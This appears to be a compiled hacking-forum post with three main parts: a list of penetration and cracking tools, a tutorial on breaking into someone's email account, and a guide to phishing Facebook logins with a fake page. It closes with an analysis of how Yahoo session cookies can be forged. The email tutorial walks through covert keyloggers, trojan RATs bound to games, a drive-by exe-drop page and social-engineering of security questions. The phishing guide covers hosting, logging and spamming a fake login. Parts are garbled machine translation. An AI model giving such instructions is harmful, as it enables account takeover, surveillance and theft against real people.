Change password if ya like & or save in whatever format if ya like ...

Top Hacking Tools

Top 10 Linux Tools 1. nmap - Nmap ("Network Mapper") is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available.

2. Nikto - Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).

3. THC-Amap - Amap is a next-generation tool for assistingnetwork penetration testing. It performs fast and reliable application protocol detection, independant on the TCP/UDP port they are being bound to.

4. Ethereal - Ethereal is used by network professionals around the world for troubleshooting, analysis, software and protocol development, and education. It has all of the standard features you would expect in a protocol analyzer, and several features not seen in any other product.

5. THC-Hydra - Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is flexible and very fast.

6. Metasploit Framework - The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. This project initially started off as a portable network game and has evolved into a powerful tool for penetration testing, exploit development, and vulnerability research.

7. John the Ripper - John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.

8. Nessus - Nessus is the world's most popular vulnerability scanner used in over 75,000 organisations world-wide. Many of the world's largest organisations are realising significant cost savings by using Nessus to audit business-critical enterprise devices and applications.

9. IRPAS - Internetwork Routing Protocol Attack Suite - Routing protocols are by definition protocols, which are used by routers to communicate with each other about ways to deliver routed protocols, such as IP. While many improvements have been done to the host security since the early days of the Internet, the core of this network still uses unauthenticated services for critical communication.

10. Rainbowcrack - RainbowCrack is a general propose implementation of Philippe Oechslin's faster time-memory trade-off technique. In short, the RainbowCrack tool is a hash cracker. A traditional brute force cracker try all possible plaintexts one by one in cracking time. It is time consuming to break complex password in this way. The idea of time-memory trade-off is to do all cracking time computation in advance and store the result in files so called "rainbow table".


Top 10 Windows Tools 1. Cain & Abel - Cain & Abel is a password recovery tool for the Microsoft Windows Operating System. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

2. SuperScan - SuperScan is a powerful TCP port scanner, pinger, resolver. SuperScan 4 (Current Version) is a completely-rewritten update of the highly popular Windows port scanning tool, SuperScan.

3. GFI LANguard Network Security Scanner - GFI LANguard N.S.S. is a network vulnerability management solution that scans your network and performs over 15,000 vulnerability assessments. It identifies all possible security threats and provides you with tools to patch and secure your network. GFI LANguard N.S.S. was voted Favorite Commercial Security Tool by NMAP users for 2 years running and has been sold over 200,000 times!

4. Retina - Retina Network Security Scanner, recognised as the industry standard for vulnerability assessment, identifies known security vulnerabilities and assists in prioritising threats for remediation. Featuring fast, accurate, and non-intrusive scanning, users are able to secure their networks against even the most recent of discovered vulnerabilities.

5. SamSpade - SamSpade provides a consistent GUI and implementation for many handy network query tasks. It was designed with tracking down spammers in mind, but can be useful for many other network exploration, administration, and security tasks. It includes tools such as ping, nslookup, whois, dig, traceroute, finger, raw HTTP web browser, DNS zone transfer, SMTP relay check, website search, and more.

6. N-Stealth - N-Stealth is a commercial web server security scanner. It is generally updated more frequently than free web scanners such as whisker and nikto, but you have to pay for the privilege.

7. Solarwinds - Solarwinds contains many network monitoring, discovery and attack tools. The advanced security tools not only test internet security with the SNMP Brute Force Attack and Dictionary Attack utilities but also validate the security on Cisco Routers with the Router Security Check. The Remote TCP Reset remotely display all active sessions on a device and the Password Decryption can decrypt Type 7 Cisco Passwords. The Port Scanner allows testing for open TCP ports across IP Address and port ranges or selection of specific machines and ports.

8. Achilles - The first publicly released general-purpose web application security assessment tool. Achilles acts as a HTTP/HTTPS proxy that allows a user to intercept, log, and modify web traffic on the fly. Due to a cyber squatter, Achilles is no longer online at its original home of www.Digizen-Security.com...OOPS!

9. CookieDigger - CookieDigger helps identify weak cookie generation and insecure implementations of session management by web applications. The tool works by collecting and analyzing cookies issued by a web application for multiple users. The tool reports on the predictability and entropy of the cookie and whether critical information, such as user name and password, are included in the cookie values.

10. Netcat (The Network SwissArmy Knife) - Netcat was originally a Unix utility which reads and writes data across network connections, using TCP or UDP protocol. It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

How to Break Into Email Accounts

Disclaimer :

I do not endorse Hacking !
This is meant for educational purpose only !
I want u to know how others can try break into your Personal life !
Beware !!

Introduction



I have written this tutorial to address a question that is all too commonly asked in any channel/chat room with "hack" in the title (asked in frequency to the point of harrassment really). So since this is a question that so many people ask, then I believe that there should at least be an answer available (regardless of the morality or "lameness" of such a question). So you as the reader are most likely reading this because you want to break into somebody's email account.


Well, you must understand that there is no 1-2-3 process to anything. I will give you options to consider when persuing such a task, but it will ultimately be up to you to do this. This is what you want to do, and no matter what sort of offers you throw up at anybody, nobody is going to do this for you. There is no program that is going to do all this for you. Also don't forget that nobody is going to hold your hand and lead you through this. I'm offering you as the reader suggestions for ways you can address this task, and that is about all the help you are going to get from anybody. So now that I've made all that clear, let's begin...


Things You Should Know



As I mentioned in the previous section, there is no program that will do all this for you. Almost all the crackers you see out there will not work, because services like Hotmail, Yahoo!, etc. have it set so that it will lock you from that account after a certain number of login attempts. There are some rare exceptions, like some crackers for Yahoo! that are made for cracking "illegal" accounts, but the thing you must understand about those types of crackers is that they are built to crack SPECIFICALLY "illegal" names. They can not be used to target a specific account on Yahoo!, so don't try to use them for this purpose. Another thing you must know if you ask this question in any "hacker" chat room/channel (which I highly discourage), or if you read something on this topic, and you hear that you have to email some address and in any way have to give up your password in the process, do NOT believe this. This is a con used to trick gullible people into handing over their passwords. So don't fall for this. Well that concludes this section, now lets get to what you want to know.


If You Have Physical Access



I will start off with options you have if you have physical access to the computer of the user that you are targeting, because it is a lot easier if you do. One option you have, that you will hear a lot if you ask this question, and anybody bothers to answer is to use a keylogger. A keylogger is an excellent option, and probably the easiest. There are a lot of keyloggers out there, ranging from hardware keyloggers, to software keyloggers. For this task, you won't need to buy a hardware keylogger, since the only advantage to a hardware one is that you can grab passwords that are given to access a certain local user on the operating system used. There are a lot of software keyloggers out there, and you can feel free to check out www.google.com to look at your options. I will go ahead and toss a couple of keyloggers out to try for those of you who seem allergic to search engines.


One option you have that is good for a free keylogger is Perfect Keylogger (which you can find at www.blazingtools.com/bpk.html). It works just fine, and has some nice options to keep it hidden from your average end user (computer user).


Another option you have, which is probably the best one you can get is Ghost Keylogger. It has a lot of options that will allow you to get the results of this program remotely (it will email you the results). However, this is not a free keylogger, so if you are wanting to get a copy you can look on the file sharing networks for a copy of the program, and the serial number for it (look on www.zeropaid.com for different file sharing clients you can try).


Once you have whatever keylogger you are going to use downloaded, just install it onto the computer you are wanting to monitor, and wait till next time they login to their email account. You will then have the password for the account. Another option you have if they use Outlook to access their email account, is to copy the *.dbx files for their Outlook account onto a floppy, and extract the emails at home (the dbx file stores the files stored in each Outlook folder on a given account, meaning the received and sent emails). When you are on the computer of the user you are targeting, look in

C:\Windows\ApplicationData\Identities\{ACblahblahblah}\Microsoft\ OutlookExpress\ and copy all the .dbx files onto a floppy. Then when you take the .dbx files back to your house, use DBXtract to extract the messages from these files. Check out the link below to download this program....


www.download-freeware-shareware.com/Freeware-Internet.php?Type=4171




Another option you have if you have physical access is to execute a RAT (Remote Administration Tool, you may know these programs as trojans) server on the computer. Of course, you do not have to have physical access to go this route, but it helps. What you must understand is that these tools are known threats, and the popular ones are quickly detected by antivirus software, and thusly taken care of. Even ISPs block incoming/outgoing traffic from the most popular ports used by these programs.



One newcomer in the RAT market that you should know about is Project Leviathan. This program uses already existing services to host it's service, instead of opening up an entirely new port. This allows it to hide itself from any port detection tool/software firewall that may be in place. This of course will not guarantee that it's server program will not be detected by any antivirus software used (actually, if the user has kept up with his/her signature tables, then it WILL be detected), but it will give you more of a chance of holding access. Search the engines to download Project Leviathan...




Once you have downloaded this tool, follow the instructions listed to install and use this program. However, since this RAT is a command line tool, you will still need another program set up on the user's computer in order to catch the desired password. For this, you can use Password Logger.. Google it




Once you have this downloaded, set it up on the targeted computer. The program will remain hidden, while logging any types of passwords into a .lst file in the same directory that you executed it on. Therefore, you can access this *.lst file through Project Leviathan remotely in order to retrieve the user's email password remotely. Well that pretty much concludes it for this section. At this very moment I can practically hear a lot of you thinking to yourselves "But, but I don't HAVE physical access!". No reason to worry, that's what the next section is for...



If You Don't Have Physical Access




Well of course most of you out there will say that you don't have physical access to your target's computer. That's fine, there still are ways you can gain access into the desired email account without having to have any sort of physical access. For this we are going to go back onto the RAT topic, to explain methods that can be used to fool the user into running the server portion of the RAT (again, a RAT is a trojan) of your choice. Well first we will discuss the basic "send file" technique. This is simply convincing the user of the account you want to access to execute the server portion of your RAT.


To make this convincing, what you will want to do is bind the server.exe to another *.exe file in order to not raise any doubt when the program appears to do nothing when it is executed. For this you can use the tool like any exe file to bind it into another program (make it something like a small game)...



On a side note, make sure the RAT of your choice is a good choice. The program mentioned in the previous section would not be good in this case, since you do need physical access in order to set it up. You will have to find the program of your choice yourself (meaning please don't ask around for any, people consider that annoying behavior).


If you don't like any of those, I'm afraid you are going to have to go to www.google.com, and look for some yourself. Search for something like "optix pro download", or any specific trojan. If you look long enough, among all the virus notification/help pages, you should come across a site with a list of RATs for you to use (you are going to eventually have to learn how to navigate a search engine, you can't depend on handouts forever). Now back to the topic at hand, you will want to send this file to the specified user through an instant messaging service.


The reason why is that you need the ip address of the user in order to connect with the newly established server. Yahoo! Messenger, AOL Instant Messenger, it really doesn't matter. What you will do is send the file to the user. Now while this transfer is going on you will go to Start, then Run, type in "command", and press Enter. Once the msdos prompt is open, type in "netstat -n", and again, press enter. You will see a list of ip addresses from left to right. The address you will be looking for will be on the right, and the port it's established on will depend on the instant messaging service you are using. With MSN Messenger it will be remote port 6891, with AOL Instant Messenger it will be remote port 2153, with ICQ it will be remote port 1102, 2431, 2439, 2440, or 2476, and with Yahoo! Messenger it will be remote port 1614.


So once you spot the established connection with the file transfer remote port, then you will take note of the ip address associated with that port. So once the transfer is complete, and the user has executed the server portion of the RAT, then you can use the client portion to sniff out his/her password the next time he/she logs on to his/her account.


Don't think you can get him/her to accept a file from you? Can you at least get him/her to access a certain web page? Then maybe this next technique is something you should look into.


Currently Internet Explorer is quite vulnerable to an exploit that allows you to drop and execute .exe files via malicious scripting within an html document. For this what you will want to do is set up a web page, make sure to actually put something within this page so that the visitor doesn't get too entirely suspicious, and then imbed the below script into your web page so that the server portion of the RAT of your choice is dropped and executed onto the victim's computer...




While you are at it, you will also want to set up an ip logger on the web page so that you can grab the ip address of the user so that you can connect to the newly established server. Here is the source for a php ip logger you can use on your page...


http://www.planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=539&lngWId=8


Just insert this source into your page along with the exedrop script, and you are set. Just convince the user to go to this page, and wait till the next time they type in their email password. However, what do you do if you can not contact this user in any way to do any of the above tricks. Well, then you definately have your work cut out for you. It doesn't make the task impossible, but it makes it pretty damn close to it. For this we will want to try info cracking. Info cracking is the process of trying to gather enough information on the user to go through the "Forgot my Password" page, to gain access into the email account.

If you happen to know the user personally, then it helps out a lot. You would then be able to get through the birthday/ zipcode questions with ease, and with a little mental backtracking, or social engineering (talking) out the information from the user be able to get past the secret question. However, what do you do if you do not have this luxury? Well in this case you will have to do a little detective work to fish out the information you need.

First off, if a profile is available for the user, look at the profile to see if you can get any information from the profile. Many times users will put information into their profile, that may help you with cracking the account through the "Forgot my Password" page (where they live, their age, their birthday if you are lucky). If no information is provided then what you will want to do is get on an account that the user does not know about, and try to strike conversation with the user. Just talk to him/her for a little while, and inconspicuously get this information out of the user (inconspicuously as in don't act like you are trying to put together a census, just make casual talk with the user and every once in a while ask questions like "When is your birthday?" and "Where do you live?", and then respond with simple, casual answers).


Once you have enough information to get past the first page, fill those parts out, and go to the next page to find out what the secret question is. Once you have the secret question, you will want to keep making casual conversation with the user and SLOWLY build up to asking a question that would help you answer the secret question. Don't try to get all the information you need in one night or you will look suspicious. Patience is a virtue when info cracking. Just slowly build up to this question. For example, if the secret question is something like "What is my dog's name?", then you would keep talking with the user, and eventually ask him/her "So how many dogs do you have? ...Oh, that's nice. What are their names?". The user will most likely not even remember anything about his/her secret question, so will most likely not find such a question suspicious at all (as long as you keep it inconspicuous). So there you go, with a few choice words and a little given time, you have just gotten the user to tell you everything you need to know to break into his/her email account. The problem with this method is that once you go through the "Forgot my Password" page, the password will be changed, and the new password will be given to you. This will of course deny the original user access to his/her own account. But the point of this task is to get YOU access, so it really shouldn't matter. Anyways, that concludes it for this tutorial. Good luck...

Hacking Facebook Using Fake Login

Hack Facebook With Fake Login? Why Not ...
Do not forget sediain Hosting / Free Hosting for scripts that would put us create a fake login later location. Do not sampe forget, because it is most obligatory thing done!

Okay go, make sure too easy. Note Both ² And Do The Right Lesson According Below. Do not Sampe There slightest mistake! Here is his review:

1. First, create a file used in hosting where you want to make a fake login with filetype: html. Then give name: "index.html", so that the sample Web URL is: http://www.hostingloedisini.com/facebook/index.html

Make Code Match With Script Examples Below:

Scriptcode at no 1:
Klick Here To See Scriptnya

2. Create a file in hostingan lo logs.php itself, the example below http://www.hostingloedisini.com/facebook/logs.php script.

Scriptcode on no 2:
Klick Here To See the script

3. Create an empty file reply txt format with the name: logs.txt - so the URL was: http://www.hostingloedisini.com/facebook/logs.txt

4. This is mandatory and should be remembered! Do not forget to change modes all the files, so the permissions to: 777 (chmod + 777). Chmod 777 means that where all files can be read (r), can be written (w), and can execute (x). So chmod 777 is to change the file so the file can be executed by the User, Groups & Other. The results set the file permissions are 777 (rwxrwxrwx) for Unix Server. For permissions problem also depends on the hosting provider, create a pake hosting nyediain not change mode, immediately without notice tested ajah this point & pray it goes to work .. Hehe ..

5. Then spread the URL that has loe created, eg: "http://www.hostingloedisini.com/facebook/" with fellow users difacebook, advertisements, or spam email as much. Can also be sulky to cewe cewe / cowo cowo who likes to click loe tu login. Guaranteed mantaf can if get the username + login! : D

6. To view the login username and password, please open the file in his logs.txt, nah klo ada email username and password. you have logged

Examples of application testing their website here:
http://www.airdata.nl/libraries/tcpdf/config/lang/facebook/index.html

Good try, good luck ..

And for the Facebook'ers mania, oh yes, ni gw kasi tips skalian careful to not let me kna & Fake Login:

1) Consider the correct website address link. Example klo FB link: http://www.facebook.com

2) Do not ever open a link or programming language (CSS, XTML, XML, or
HTML) is strange. If the clicks, probably we will give an account
our username and password.

3) Use a virtual keyboard that can be obtained easily.
For Windows XP look, just simply click 'start' -> All Programs ->
Accessories -> Accessibility -> 'On-Screen Keyboard'
For Windows XP view instead, just simply click 'start' -> Program Files
-> Accessories -> Accessibility -> 'On-Screen Keyboard'

4) When playing in the Public Internet (Warnet), avoid check-list box
"Remember me" when logging in, because it can save the username
and password on the computer. Except for personal computer use.

5) If you are suddenly asked to login again, should be careful, because the possibility of the pages are re login page intentionally designed artificial

Yahoo Session Cookie Generator



A posting on milw0rm.com by gammarays very interesting in my opinion. In the video proof of conceptnya seen he can generate the authentication cookie to go into any yahoo as your username. How did he do it?

I have read his paper and discussed with him via email. Because of its highly critical of some important things he did not disclose, in this case I agree because I also have a yahoo account, of course I do not want others to read my email: D

Yahoo Authentication

Yahoo implement single sign-on authentication in doing so someone enough to log in just once, when the login is successful, then he will get the kind of free pass card to be able to enjoy all the services in the yahoo network. Freepass card mentioned is in the form of cookies. Only the user who holds the right cookie is allowed into. Without the right cookie, you will be kicked to the login page.

Yahoo cookie that functions to authentication are Y and T. Only two of this cookie you need to access all of yahoo services, including email and messenger. Yahoo authentication scheme which is normal as shown below:
Red arrows indicate access without a cookie, while the blue is access to the cookies. In the example above I used the example mail service. Login server in yahoo is the only login.yahoo.com be accessed with https. When a user access without cookies then she will be redirected to the login server, if the login is successful he will be given a cookie and redirected back to the service which will be accessed initially.

Gammarays paper shows that a user can generate his own cookienya, so he no longer need to log in to login.yahoo.com. That means he does not need to know the password for someone to read their email, flownya look like in the following figure:


In the flow over the user does not need access to login.yahoo.com because he can make your own cookie valid for entry into mail.yahoo.com. This means he can access any account without knowing password. Let's surgical cookie contents of Y and T.

Y Cookies

Y cookie is static, every user can successfully log into yahoo, he will get the value of Y the same cookie. Cookies Y consists of several fields:

* V: version, always filled with a value of 1.
* N: random value generated when users create an account or change passwords.
* L: username that are encoded with a simple substitution technique. Mapping of "abcdefghijklmnopqrstuvwxyz0123456789._ @ - +" to "0123456789abcdefghijklmnopqrstuvwxyz._-+". An example would be rizkiwicaksono username h8pa8m820aiede.
* R: registers week. Time relative to register your account on June 30, 1996 - 6:00 pm in the week.

Of all the variables that are confidential n and r. Without knowing the value of n and r are true, then could not make its own cookie Y. To get the values of n and r can access the database with yahoo (you need to hack yahoo server) as the Gammarays, or you can steal someone else a cookie and then retrieve the value of n and r from the cookie. Yahoo only use https on login time, then when someone does not access the service via https, so it was easy to in-Sniff cookienya.

T Cookies

T Cookies are not static in nature because it contains the timestamp field and ip address. Besides these cookies also contain signature functions maintain the integrity of other fields. With this signature if there is another field that is changed then the signature is not valid anymore menjad.

Existing field at T A cookie is:

* A: age of YAE value or QAE. Indicates whether this user can access the content for readers aged 18 years and over.
* D: data consisting of some subfield: a, sl, g, ok, zz, tip.
* Sk: signature version 3.
* Ks: signature version 4.

Sub-field of the field d is:

* A: age, YAE or QAE.
* G: globally unique identifier. When you login to yahoo and saw your profile, will diredirectt to address: profiles.yahoo.com / u / .
* Ok: verified email, usually contain-ZW0.
* Sl: sled ID retrieved from the database user (fixed in nature, changing the password will not change sl).

* Zz: timestamp, used to check whether the cookies have expired.
* Tip: tcookie ip address, ip address user.

Of all the fields in the cookie is a secret T sl. Global identifier can be found using the Yahoo Query Language console. Example: select * from yahoo.identity where yid = 'spullara' result is: 7C7SIF3MMHEOH3MJ5HYPYQQVQI.
While zzz field is taken from the time and tips taken from ip address. After all of the fields known to the field a value, sl, g, ok, zz, tip into the field diconcat d. Then the field l, n and d used as input to produce the signature stored in the field sk. Then ks field generated by the input of the l, n, d and sk. Script to generate sk and ks is on the Gammarays paper. However, for security reasons the script is not complete and therefore could not run.

Of all the fields needed to be a secret key is n, r and sl. The rest is a field that is not confidential. Field confidential n, r and sl was also easy to steal because the content of this field is sent in the form of cookies that were not so vulnerable enkrip sniffing. Once the cookies had been stolen, then the value of n, r and sl victims will be taken with ease. If that happens then the attacker can then generate a cookie to Y and T itself to access the victim's account.

Authentication tokens in yahoo is not in the form of random sessionid but in the form of a collection of fields that are encoded and given a signature. Herein lies the fault, ie yahoo implement security through obscurity in tokennya session. Because once and signature encoding algorithm is known and the field n, r and sl is obtained, the attacker can easily create their own cookienya session. This is different to the use of random session id in a cookie.

Stolen random session id is valid only for session lifetime. Stolen n, r and sl last forever (until victims change their password).

Random session id does not rely on algorithms or data confidentiality, but uses a random number that is very difficult to predict. A good session id must be one time only (unique) and extremely hard to guess. In this way the session id to get the attacker to perform brute-force guessing session id. Even if he managed to steal sessionid the sessionid is only valid until the session is valid, then it would be useless sessionid. Unlike the sessionid leakage, leakage fields n, r and sl in yahoo cookies lasted so long, until the user change the password. Although the user has logged off of yahoo, the attacker who has a field n, r and sl could go back in to generate cookies and T. Y